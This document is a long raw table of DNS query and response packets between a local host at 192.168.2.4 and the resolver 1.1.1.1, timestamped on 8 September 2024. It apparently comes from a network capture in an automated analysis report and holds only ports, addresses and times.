                                                                                                                                                                                                            Sep 8, 2024 08:59:58.784241915 CEST53536131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.786549091 CEST6028953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.787426949 CEST5832153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.788440943 CEST5073553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.788645983 CEST4993853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.788665056 CEST53539621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.789299011 CEST53599821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.791394949 CEST5777453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.792143106 CEST53504651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.793265104 CEST53608671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.793926001 CEST5880353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.794574022 CEST5080953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.798095942 CEST53602891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.798106909 CEST53507351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.798116922 CEST53499381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.802093983 CEST53583211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.802465916 CEST5815153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.803540945 CEST53508091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.805100918 CEST53588031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.806516886 CEST6184253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.810502052 CEST53577741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.811042070 CEST4925653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.812926054 CEST5038053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.813493967 CEST5532953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.815409899 CEST6155453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.815685987 CEST6536453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.817760944 CEST5527453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.818649054 CEST53581511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.819437981 CEST53550991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.820208073 CEST6290153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.822395086 CEST53618421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.822406054 CEST53553291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.824851036 CEST53615541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.825628996 CEST53653641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.826435089 CEST53492561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.826833963 CEST53552741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.827785969 CEST4990853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.828798056 CEST53503801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.829488993 CEST6337753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.829902887 CEST6424753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.832957983 CEST6474053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.835247040 CEST5290253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.835611105 CEST53629011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.836348057 CEST5980553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.836852074 CEST5075753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.837791920 CEST53499081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.839175940 CEST53633771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.840898037 CEST53642471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.844888926 CEST6434153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845065117 CEST5525353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845308065 CEST4930953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845509052 CEST6361653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845777988 CEST53529021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845788002 CEST53507571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.847115040 CEST5931153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.852304935 CEST5953053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.853950977 CEST53598051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.853975058 CEST53593011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.853979111 CEST6241853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.854379892 CEST53552531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.855498075 CEST53643411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.855509043 CEST53493091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.855519056 CEST53543841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.856489897 CEST5977753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.856848955 CEST5800953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.856975079 CEST53593111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.857247114 CEST6552453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.858541012 CEST6028653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.858892918 CEST6169853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.859162092 CEST5971453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.859668016 CEST6312053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.860861063 CEST5728453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.861896038 CEST53595301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.863189936 CEST53624181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.863199949 CEST53647401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.866274118 CEST53655241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.867808104 CEST53616981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.868246078 CEST53597141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.869878054 CEST53631201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.869887114 CEST53572841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.874383926 CEST53580091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.874393940 CEST53602861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.877244949 CEST53636161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.886657953 CEST53597771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.899663925 CEST53614121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.336478949 CEST6311953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.336709023 CEST5017553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.337424040 CEST6524153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.340174913 CEST5112053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.344599009 CEST5969553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.346198082 CEST53501751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.352117062 CEST53631191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.354130030 CEST53652411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.355489969 CEST53596951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.370605946 CEST53511201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.390568972 CEST5230753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.407099962 CEST5854153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.408020020 CEST5581453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.408689976 CEST6345153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.410051107 CEST6494853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.413836002 CEST6238253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.415410995 CEST6013053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.416136980 CEST5189653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.416357994 CEST53585411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.416744947 CEST5916053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.418862104 CEST5963553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.419569969 CEST5097253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.420211077 CEST6002953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.421147108 CEST53649481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.421284914 CEST6380553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.421875954 CEST53523071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.423485994 CEST5148153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.423562050 CEST53623821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.424855947 CEST53634511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.424999952 CEST5125953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.426054001 CEST53601301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.426702023 CEST53518961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.427670956 CEST53591601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.429373026 CEST53596351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.430444956 CEST53638051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.434317112 CEST6328753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.434787035 CEST6107353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435144901 CEST6139853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435270071 CEST6331053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435372114 CEST6176753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435511112 CEST6093753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435676098 CEST6434953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435825109 CEST5652053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435971022 CEST5479353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436295033 CEST4942053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436497927 CEST6036453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436566114 CEST5097853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436726093 CEST5732253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436784983 CEST5629653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.437239885 CEST5773053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.437477112 CEST53558141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.438705921 CEST53600291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.444639921 CEST53613981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.444763899 CEST53565201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.444782972 CEST53633101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.444885969 CEST53617671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.445311069 CEST53603641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.445359945 CEST53643491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.445626020 CEST53547931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.446010113 CEST53609371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.446021080 CEST53494201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.448745012 CEST53562961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.448755026 CEST53573221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.449184895 CEST53577301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.449873924 CEST53509721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.450023890 CEST53632871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.452004910 CEST53610731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.452331066 CEST53509781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.455363035 CEST53514811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.455853939 CEST6147953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.456053019 CEST6506553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.456222057 CEST5745853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.459121943 CEST5638353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462091923 CEST5719553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462443113 CEST5614853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462798119 CEST5397553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463213921 CEST4973153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463685036 CEST5734853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463977098 CEST5153953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463989019 CEST4940253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464195013 CEST5134553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464340925 CEST6058353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464458942 CEST5344453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464509964 CEST5345353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464724064 CEST6167853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464818954 CEST5148453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465053082 CEST6286153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465226889 CEST5426353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465553045 CEST53574581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465718031 CEST5893353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466330051 CEST4972053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466391087 CEST53614791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466564894 CEST6523453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466736078 CEST5155353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.467180967 CEST6164653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.467614889 CEST6504353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.471160889 CEST53563831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.472213984 CEST53571951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.472517967 CEST53573481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.472908974 CEST53539751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.472919941 CEST53515391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.473491907 CEST53497311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.473501921 CEST53494021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.473846912 CEST53628611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.474591970 CEST53534441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.474661112 CEST53589331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.476041079 CEST53515531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.476083040 CEST53652341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.477149963 CEST53616461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.477358103 CEST53650431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.478130102 CEST53561481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.478943110 CEST5883653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.479080915 CEST5270653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.479657888 CEST53605831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.479907990 CEST53542631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.481188059 CEST53534531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.481602907 CEST53497201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.481935024 CEST53616781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.486285925 CEST5346953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.489938974 CEST53588361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.493767977 CEST53513451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.496088982 CEST53534691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.595613003 CEST53512591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.622622013 CEST53514841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.713926077 CEST53527061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.749037027 CEST53650651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.866164923 CEST6385953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.876198053 CEST53638591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.773371935 CEST5584953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.773993015 CEST5306553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.774943113 CEST5824153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.775681973 CEST5248653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.779607058 CEST6214553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.782767057 CEST53558491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.784328938 CEST53530651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.788887024 CEST53621451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.793544054 CEST5517853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.794034958 CEST5347053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.794223070 CEST53582411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.795186996 CEST6488353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.799066067 CEST5794253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.802900076 CEST53551781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.803617001 CEST53534701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.804723024 CEST53648831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.805952072 CEST53524861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.810828924 CEST6415053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.814327002 CEST5858253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.816829920 CEST5570053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.817306042 CEST6153553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.817699909 CEST4980753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.819593906 CEST5757453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.819789886 CEST4997153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.820117950 CEST6311453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.821548939 CEST5317453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.823817015 CEST6289253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.824800014 CEST6511153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.825222969 CEST6385853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.825501919 CEST6355753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.826361895 CEST5803053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.826674938 CEST53641501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.826945066 CEST53498071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.826999903 CEST6122953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.828895092 CEST53557001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.829343081 CEST5943453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.829411983 CEST6105453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.830195904 CEST53579421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.830368996 CEST53631141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.830760002 CEST53575741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.831976891 CEST53531741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.832813025 CEST5320653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.833394051 CEST53615351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.834059000 CEST5000053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.834520102 CEST5766253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.835238934 CEST53638581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.835822105 CEST6032953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.836374998 CEST53635571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.836432934 CEST53612291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.840625048 CEST53610541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.840688944 CEST53594341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.841103077 CEST53651111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.841377020 CEST53580301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.843264103 CEST53532061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.843535900 CEST6404053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.843806982 CEST5134453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.844103098 CEST53576621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.844624043 CEST5466753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.844719887 CEST6130353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.845124006 CEST6190453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.845201015 CEST5010553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.845906019 CEST53585821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.846040964 CEST53603291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.849111080 CEST5430953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.850836039 CEST53499711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.853898048 CEST53513441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.854587078 CEST53501051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.854644060 CEST53619041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.855050087 CEST53628921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.860308886 CEST53546671.1.1.1192.168.2.4
